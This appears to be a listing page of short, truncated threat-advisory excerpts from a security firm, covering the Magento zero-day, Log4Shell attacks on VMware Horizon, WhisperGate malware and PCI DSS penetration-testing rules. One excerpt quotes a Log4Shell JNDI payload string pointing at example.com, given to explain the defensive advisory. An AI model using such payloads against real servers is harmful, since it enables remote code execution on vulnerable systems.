Attackers are actively exploiting a critical zero-day vulnerability in Adobe Commerce and Magento Open Source productsFeatured

Severity: Critical INTRODUCTION Adobe has addressed critical Magento Zero-Day Vulnerability (CVE-2022-24086) that is under active exploitation by threat actors. The security flaw impacts Adobe Commerce and Magento Open Source products. Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary code and may result in the complete compromise of a vulnerable system. The […]

Threat actor groups are targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilitiesFeatured

Severity: High Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon. Attack Chain:• In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to ${jndi:ldap://example.com} targeting vulnerable VMware Horizon servers.• The attack exploits the Log4Shell vulnerability […]

Threat actors are targeting critical organizations using destructive malware – “WhisperGate”Featured

The threat campaign is referred to as Operation Bleeding Bear. The attacks are currently limited to Ukrainian government agencies and businesses; however, the attack seems to have evolved and sophisticated over time, targeting almost all countries. The threat poses a risk to any government agency, non-profit or enterprise system. The malware campaign has been mapped […]

Zero-day vulnerability (aka Log4Shell) in Apache Log4j is being actively exploited

INTRODUCTION Log4Shell vulnerability (CVE-2021-44228) impacts multiple versions of awidely distributed Java software component, Apache Log4j 2. The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables and allows a remote attacker to execute arbitrary code on the target system. Apache Log4j2 <2.15, JNDI enables attackers to call external java […]

NII THREAT ADVISORY – 24 AUGUST 2016

Penetration Testing as per PCI DSS version 3.2 As per PCI DSS v3.2, Requirement 11.3 addresses penetration testing activity for organizations following PCI DSS compliance. The requirement is further divided into following sub requirements: Requirement 11.3.1: Conduct external penetration testing at least annually or after any significant change has occurred in organization’s environment Requirement 11.3.2: […]

NII Threat Advisory | 5th August 2016

Vendor Patches: Google Releases Security Update for Chrome Cisco Releases Security Update Oracle Releases Security Bulletin Apple Releases Multiple Security Updates Drupal Releases Security Advisory Security Breaches: Disney Playdom forums shut down following data breach Pokémon GO Creator’s Twitter Account Hacked North Korean hackers gain access to personal data of dozens of South Korean diplomats […]